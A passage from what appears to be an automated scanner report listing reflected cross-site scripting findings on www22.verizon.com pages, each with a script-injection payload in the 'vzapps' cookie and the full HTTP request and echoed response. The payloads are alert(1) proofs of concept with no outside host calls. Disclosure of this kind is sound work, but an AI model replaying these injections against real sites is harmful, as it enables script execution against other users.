<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
OS Digital TV and High-Speed Internet Features','');
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "9e344"-alert(1)-"44c032e99f0"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.140. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b381b'><script>alert(1)</script>ce796c23fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb381b'><script>alert(1)</script>ce796c23fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70907
Expires: Sat, 20 Nov 2010 00:11:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=TXb381b'><script>alert(1)</script>ce796c23fc; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:50 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB381B'><SCRIPT>ALERT(1)</SCRIPT>CE796C23FC ' />
...[SNIP]...

1.141. http://www22.verizon.com/Residential/aboutFiOS/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload cb6db<script>alert(1)</script>2abfc7b8635 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXcb6db<script>alert(1)</script>2abfc7b8635; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69363
Expires: Sat, 20 Nov 2010 00:11:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/
Set-Cookie: ContextInfo_State=TXcb6db<script>alert(1)</script>2abfc7b8635; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXCB6DB<SCRIPT>ALERT(1)</SCRIPT>2ABFC7B8635 </DIV>
...[SNIP]...

1.142. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3e936<script>alert(1)</script>c5abaf729ed was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX3e936<script>alert(1)</script>c5abaf729ed; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78163
Expires: Sat, 20 Nov 2010 00:11:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX3e936<script>alert(1)</script>c5abaf729ed; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3E936<SCRIPT>ALERT(1)</SCRIPT>C5ABAF729ED </DIV>
...[SNIP]...

1.143. http://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ab065'><script>alert(1)</script>e9047e9551f was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXab065'><script>alert(1)</script>e9047e9551f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 00:11:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:29 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=TXab065'><script>alert(1)</script>e9047e9551f; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:29 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAB065'><SCRIPT>ALERT(1)</SCRIPT>E9047E9551F ' />
...[SNIP]...

1.144. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload dd3b4<script>alert(1)</script>757b9633f3c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXdd3b4<script>alert(1)</script>757b9633f3c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73425
Expires: Sat, 20 Nov 2010 00:13:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/
Set-Cookie: ContextInfo_State=TXdd3b4<script>alert(1)</script>757b9633f3c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:03 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDD3B4<SCRIPT>ALERT(1)</SCRIPT>757B9633F3C </DIV>
...[SNIP]...

1.145. http://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 26326'><script>alert(1)</script>0d04466e0c9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX26326'><script>alert(1)</script>0d04466e0c9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73429
Expires: Sat, 20 Nov 2010 00:12:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX26326'><script>alert(1)</script>0d04466e0c9; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX26326'><SCRIPT>ALERT(1)</SCRIPT>0D04466E0C9 ' />
...[SNIP]...

1.146. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a49de'><script>alert(1)</script>ec31fe281d2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa49de'><script>alert(1)</script>ec31fe281d2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73636
Expires: Sat, 20 Nov 2010 00:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=TXa49de'><script>alert(1)</script>ec31fe281d2; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA49DE'><SCRIPT>ALERT(1)</SCRIPT>EC31FE281D2 ' />
...[SNIP]...

1.147. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 202c8<script>alert(1)</script>a033bcd02b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX202c8<script>alert(1)</script>a033bcd02b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73632
Expires: Sat, 20 Nov 2010 00:11:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX202c8<script>alert(1)</script>a033bcd02b5; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:33 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX202C8<SCRIPT>ALERT(1)</SCRIPT>A033BCD02B5 </DIV>
...[SNIP]...

1.148. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8020'><script>alert(1)</script>7e15a2d3a4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc8020'><script>alert(1)</script>7e15a2d3a4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112507
Expires: Sat, 20 Nov 2010 00:15:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=TXc8020'><script>alert(1)</script>7e15a2d3a4; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC8020'><SCRIPT>ALERT(1)</SCRIPT>7E15A2D3A4 ' />
...[SNIP]...

1.149. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 4afcd<script>alert(1)</script>f5636ef73be was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4afcd<script>alert(1)</script>f5636ef73be; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112505
Expires: Sat, 20 Nov 2010 00:15:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX4afcd<script>alert(1)</script>f5636ef73be; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
